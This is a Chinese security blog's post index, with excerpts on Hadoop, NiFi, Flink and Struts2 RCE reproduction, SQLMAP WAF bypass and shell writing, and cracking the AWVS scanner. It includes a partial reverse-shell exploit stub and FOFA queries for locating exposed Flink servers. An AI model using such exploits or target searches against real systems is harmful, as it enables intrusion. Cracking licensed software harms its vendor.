自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

预览 取消 提交

自定义博客皮肤

-+
上一步保存

Birdman-one的博客

重名鸟实验室

  • 博客(20)
  • 收藏
  • 关注
排序:
按最后发布时间
按访问量
RSS订阅

原创 WebSphere中间件漏洞总结

WebSphere为SOA(面向服务架构)环境提供软件,以实现动态的、互联的业务流程,为所有业务情形提供高度有效的应用程序基础架构。WebSphere是IBM的应用程序和集成软件平台,包含所有必要的中间件基础架构(包括服务器、服务和工具),这些基础架构是创建、部署、运行和持续监视企业级Web应用程序和跨平台、跨产品的解决方案所必需的。与WAS6,WAS7相比较而言WAS8发生了很大的改变,其安装介质和以前截然不同;并且官网已经明确说明:版本1.7.4.7及更早版本已被1.8.x和1.9.x版本取代。

2023-03-08 17:34:22 1596

原创 Suo5-HTTP 代理隧道工具

suo5 是一个全新的 HTTP 代理隧道,基于 HTTP/1.1 的 Chunked-Encoding 构建。相比 Neo-reGeorg 等传统隧道工具, suo5 的性能可以达到其数十倍。

2023-03-03 22:44:41 5861

原创 第一周-认识内网渗透

在目标不知情或者没得到授权的情况下发起黑客攻击是非法的。所以通常是建立一个自己的实验室,练习HK技术。

2023-03-02 17:05:46 371

原创 学习方法

<h2 id="学习方法">学习方法</h2><h3 id="学习的本质">学习的本质</h3><p>知识的本质就是将新的知识与旧的知识进行连接。</p><h3 id="费曼学习法">费曼学习法

2021-04-08 00:00:09 309

原创 Hadoop未授权访问getshell

Hadoop未授权访问getshell一、环境搭建cd /vulhub/hadoop/unauthorized-yarndocker-compose up -dhttp://ip:8088/cluster访问地址出现此页面代表未授权访问二、漏洞复现exp#!/usr/bin/env pythonimport requeststarget = 'http://xx.xx.xx.xx:8088/'lhost = 'x.x.x.x' # 把你的本地主机ip放在这里,在9999端口监

2020-12-11 22:14:55 1653

原创 Apache NiFi远程代码执行-RCE

Apache NiFi远程代码执行-RCE简介:Apache NiFi 是一个易于使用、功能强大而且可靠的数据处理和分发系统。Apache NiFi 是为数据流设计。它支持高度可配置的指示图的数据路由、转换和系统中介逻辑。EXP:https://github.com/imjdl/Apache-NiFi-Api-RCE作者这里使用exp不行使用方法:python exp.py [url] [反弹shell命令]MSF module:https://github.com/rapid7/metasp

2020-12-11 22:11:45 1719

原创 Apache Flink 未授权访问+远程代码执行

Apache Flink 未授权访问+远程代码执行作者:Birdman-one前言近日,有安全研究员公开了一个Apache Flink的任意Jar包上传导致远程代码执行的漏洞,影响范围:<= 1.9.1(最新版本)此次复现就是通过版本Version: 1.10.1进行复现利用。FOFAFOFA 语句app="Apache-Flink" && country="CN"app="Apache-Flink" && country="CN" &&am

2020-12-11 21:56:20 2407

原创 s2-061漏洞复现

s2-061Struts2介绍是一个基于MVC设计模式的Web应用框架,它本质上相当于一个servlet,在MVC设计模式中,Struts2作为控制器(Controller)来建立模型与视图的数据交互。Struts 2是Struts的下一代产品,是在 struts 1和WebWork的技术基础上进行了合并的全新的Struts 2框架。其全新的Struts 2的体系结构与Struts 1的体系结构差别巨大。Struts 2以WebWork为核心,采用拦截器的机制来处理用户的请求,这样的设计也使得业务逻辑

2020-12-11 21:53:49 1990

原创 s2-059漏洞复现

s2-059Struts2介绍是一个基于MVC设计模式的Web应用框架,它本质上相当于一个servlet,在MVC设计模式中,Struts2作为控制器(Controller)来建立模型与视图的数据交互。Struts 2是Struts的下一代产品,是在 struts 1和WebWork的技术基础上进行了合并的全新的Struts 2框架。其全新的Struts 2的体系结构与Struts 1的体系结构差别巨大。Struts 2以WebWork为核心,采用拦截器的机制来处理用户的请求,这样的设计也使得业务逻辑控

2020-12-11 21:49:47 1428

原创 Linux版awvs破解详细步骤

一:介绍版本:最新版v_190325161环境:ubuntu16.04lts镜像下载链接:https://pan.baidu.com/s/15ZxSxkfaSIdMzdnDjlOTQg提取码:utvd 安装略过自行百度是建议支持正版二:Linux_awvs安装记录环境:Ubuntu 16.04.1 LTS安装好依赖:sudo apt-get install li...

2019-06-30 23:27:13 12466 2

原创 SQLMAP渗透笔记之绕过WAF防火墙

---------------------------------------------------------------------------------------------                SQLMAP渗透笔记之绕过WAF防火墙------------------------------------------------------------

2017-12-26 11:37:24 10769 1

转载 SQLMAP渗透笔记之请求延时

---------------------------------------------------------------------------------------------                   SQLMAP渗透笔记之请求延时---------------------------------------------------------

2017-12-26 11:36:53 9779

转载 SQLMAP渗透笔记之交互写shell及命令执行(即os参数的使用)

---------------------------------------------------------------------------------------------                       SQLMAP渗透笔记之交互写shell及命令执行(即os参数的使用)----------------------------------

2017-12-26 11:36:24 14347

转载 SQLMAP渗透笔记之POST登陆框注入

氷刀's Blog---------------------------------------------------------------------------------------------                SQLMAP渗透笔记之POST登陆框注入                          ------------

2017-12-26 11:35:52 2292

原创 SQLMAP渗透笔记之MySQL数据库注入

---------------------------------------------------------------------------------------------                SQLMAP渗透笔记之MySQL数据库注入--------------------------------------------------------------

2017-12-26 11:35:18 1338

原创 SQLMAP渗透笔记之Mysql Dos攻击

---------------------------------------------------------------------------------------------                SQLMAP渗透笔记之Mysql Dos攻击---------------------------------------------------------

2017-12-26 11:34:35 1089

原创 SQLMAP渗透笔记之MSSQL数据库注入

---------------------------------------------------------------------------------------------                SQLMAP渗透笔记之MSSQL数据库注入                                ------------------------

2017-12-26 11:34:06 4322

原创 SQLMAP渗透笔记之file参数的使用

---------------------------------------------------------------------------------------------                SQLMAP渗透笔记之file参数的使用-------------------------------------------------------

2017-12-26 11:32:23 6503

转载 SQLMAP渗透笔记之Cookie中转注入

---------------------------------------------------------------------------------------------                SQLMAP渗透笔记之Cookie中转注入                                     ---------------

2017-12-26 11:31:41 2672

原创 Access数据库注入

---------------------------------------------------------------------------------------------                SQLMAP渗透笔记之Access数据库注入-----------------------------------------------------

2017-12-26 11:29:54 381

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除